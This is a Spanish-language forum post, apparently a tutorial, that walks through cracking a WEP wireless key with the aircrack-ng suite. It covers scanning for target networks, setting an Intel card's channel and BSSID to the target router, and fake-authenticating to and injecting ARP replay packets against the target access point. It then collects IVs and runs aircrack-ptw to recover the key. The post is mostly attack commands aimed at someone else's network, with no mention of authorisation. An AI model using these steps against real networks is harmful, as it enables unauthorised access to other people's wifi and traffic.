Y el programa que ? , pulsas en " Escanear " y te tira un msgbox con la clave :$ ? Jajajaja
Activa el modo X con el siguiente comando:
startx
Para empezar lanzamos el terminal y ejecutamos airodump-ng para ver las redes que tenemos a nuestro alcance:
airodump-ng rtap0
Ahora necesitamos los siguientes datos (BSSID, CH y ESSID) os dejo una captura del Airodump funcionando para haceros una idea.
BSSID: Mac del router.
CH: Canal.
ESSID: Identificador de la red. Ej. WLAN_C4
Una vez tenemos estos datos anotados podemos cerrar Airodump-ng.
Ahora procedemos a configurar nuestra tarjeta Intel395:
Con el bloc o cualquier editor de texto consola tipo “Vi” vamos a la siguiente ruta:
/sys/class/net/wifi0/device
Modificamos los ficheros siguientes:
rate: Cambiamos 108 por 2.
channel: Ponemos el canal en el que esta nuestro objetivo (CH en Airodump-ng).
bssid: Cambiamos 00:00:00:00:00:00 por la MAC del ap objetivo, (BSSID en Airodump-ng).
Levantamos nuestra tarjeta de red:
ifconfig wifi0 up
Ahora estamos listos para realizar el “ataque”.
1.- Lanzamos una desautenticación cada 10 segundos:
aireplay-ng -1 10 -e Nombre_del_ap -a mac_del_ap -h mi_mac wifi0
1.1.- Para conocer nuestra mac:
ifconfig wifi0
2.- Reinyectamos paquetes.
aireplay-ng -3 -b mac_del_ap -h mi_mac wifi0
3.- Capturamos el trafico:
airodump-ng rtap0 -w captura
4.- Esperamos a tener entre 80.000 y 150.000 IV´s (Apartado # Data de Airodump-ng), lanzamos aircrack-ptw para sacar la clave.
aircrack-ptw archivo.cap
Si no lo consigue con la versión ptw nos ejecuta automaticamente aircrack-ng.
Nota: Para los que no tienen Intel395 os recomiendo descargar Wifislax.
[Enlace externo eliminado para invitados]